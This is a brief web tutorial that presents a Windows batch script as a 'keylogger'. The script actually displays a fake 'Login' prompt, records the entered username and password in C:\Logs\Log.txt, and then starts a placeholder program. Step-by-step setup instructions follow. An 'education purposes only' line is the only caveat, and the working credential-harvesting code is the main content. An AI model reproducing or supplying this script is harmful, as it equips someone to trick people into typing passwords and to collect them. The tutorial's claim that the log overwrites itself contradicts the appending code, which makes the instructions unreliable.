HOW TO CREATE A KEYLOGGER IN NOTEPAD

Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for education purposes only.


@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<

exit

  • Now paste the above code into Notepad and save it as a Logger.bat file.
  • Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
  • Drag that folder in to the C:\
  • Test out the Logger.bat!
  • Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

Comments